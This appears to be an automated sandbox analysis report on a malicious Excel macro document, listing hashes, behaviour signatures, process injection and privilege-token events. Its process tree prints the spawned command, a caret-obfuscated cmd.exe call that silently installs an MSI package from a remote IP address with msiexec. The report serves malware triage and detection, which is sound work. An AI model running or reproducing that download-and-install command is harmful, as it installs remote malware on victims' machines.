95bd7a62ced0c80358c8e3fd12bb8acb9aecea2b35fa43e7a343cb38ae233e5f

General

Target

SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls
Size

172KB
MD5

ac016bd363b76505c4b5f55fa92bf343
SHA1

245a98cac3ab0bb615aa265c2774e34c1fcf2bd3
SHA256

95bd7a62ced0c80358c8e3fd12bb8acb9aecea2b35fa43e7a343cb38ae233e5f
SHA512

812ed62c7379e690f3e9af0cde79d1e38e5ed0971f98f0662584ea885e03bc8b36e31dfc7c54a2be2f5989605ff59e6d53a4e4b7f875fff0f8ac9dc40bdbb7c2

Score

10^/10

Malware Config

Signatures

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1196 EXCEL.EXE

pid	process
1196	EXCEL.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1500	1196	cmd.exe	EXCEL.EXE

Use of msiexec (install) with remote resource 1 IoCs

Processes:

msiexec.exe

pid process

908 msiexec.exe
Office loads VBA resources, possible macro or embedded object present
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

EXCEL.EXE

pid process

1196 EXCEL.EXE
1196 EXCEL.EXE
1196 EXCEL.EXE

pid	process
908	msiexec.exe

pid	process
1196	EXCEL.EXE
1196	EXCEL.EXE
1196	EXCEL.EXE

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

EXCEL.EXEcmd.exe

description	pid	process	target process
PID 1196 wrote to memory of 1500	1196	EXCEL.EXE	cmd.exe
PID 1196 wrote to memory of 1500	1196	EXCEL.EXE	cmd.exe
PID 1196 wrote to memory of 1500	1196	EXCEL.EXE	cmd.exe
PID 1500 wrote to memory of 908	1500	cmd.exe	msiexec.exe
PID 1500 wrote to memory of 908	1500	cmd.exe	msiexec.exe
PID 1500 wrote to memory of 908	1500	cmd.exe	msiexec.exe
PID 1500 wrote to memory of 908	1500	cmd.exe	msiexec.exe
PID 1500 wrote to memory of 908	1500	cmd.exe	msiexec.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

msiexec.exe

pid process

908 msiexec.exe

pid	process
908	msiexec.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

Processes:

msiexec.exemsiexec.exe

description	pid	process
Token: SeShutdownPrivilege	908	msiexec.exe
Token: SeIncreaseQuotaPrivilege	908	msiexec.exe
Token: SeRestorePrivilege	640	msiexec.exe
Token: SeTakeOwnershipPrivilege	640	msiexec.exe
Token: SeSecurityPrivilege	640	msiexec.exe
Token: SeCreateTokenPrivilege	908	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	908	msiexec.exe
Token: SeLockMemoryPrivilege	908	msiexec.exe
Token: SeIncreaseQuotaPrivilege	908	msiexec.exe
Token: SeMachineAccountPrivilege	908	msiexec.exe
Token: SeTcbPrivilege	908	msiexec.exe
Token: SeSecurityPrivilege	908	msiexec.exe
Token: SeTakeOwnershipPrivilege	908	msiexec.exe
Token: SeLoadDriverPrivilege	908	msiexec.exe
Token: SeSystemProfilePrivilege	908	msiexec.exe
Token: SeSystemtimePrivilege	908	msiexec.exe
Token: SeProfSingleProcessPrivilege	908	msiexec.exe
Token: SeIncBasePriorityPrivilege	908	msiexec.exe
Token: SeCreatePagefilePrivilege	908	msiexec.exe
Token: SeCreatePermanentPrivilege	908	msiexec.exe
Token: SeBackupPrivilege	908	msiexec.exe
Token: SeRestorePrivilege	908	msiexec.exe
Token: SeShutdownPrivilege	908	msiexec.exe
Token: SeDebugPrivilege	908	msiexec.exe
Token: SeAuditPrivilege	908	msiexec.exe
Token: SeSystemEnvironmentPrivilege	908	msiexec.exe
Token: SeChangeNotifyPrivilege	908	msiexec.exe
Token: SeRemoteShutdownPrivilege	908	msiexec.exe
Token: SeUndockPrivilege	908	msiexec.exe
Token: SeSyncAgentPrivilege	908	msiexec.exe
Token: SeEnableDelegationPrivilege	908	msiexec.exe
Token: SeManageVolumePrivilege	908	msiexec.exe
Token: SeImpersonatePrivilege	908	msiexec.exe
Token: SeCreateGlobalPrivilege	908	msiexec.exe

Blacklisted process makes network request 1 IoCs

Processes:

msiexec.exe

flow pid process

3 640 msiexec.exe

flow	pid	process
3	640	msiexec.exe

C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1196

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/new-order0456.msi /qn
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1500

C:\Windows\system32\msiexec.exe
msiExec /i http://199.195.250.60/gg/new-order0456.msi /qn
3⤵
- Use of msiexec (install) with remote resource
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:908

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
PID:640

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/908-3-0x0000000000000000-mapping.dmp

Download
memory/908-4-0x0000000002320000-0x0000000002324000-memory.dmp

Filesize
16KB

Download
memory/1196-0-0x0000000006180000-0x0000000006280000-memory.dmp

Filesize
1024KB

Download
memory/1196-1-0x0000000006180000-0x0000000006280000-memory.dmp

Filesize
1024KB

Download
memory/1500-2-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads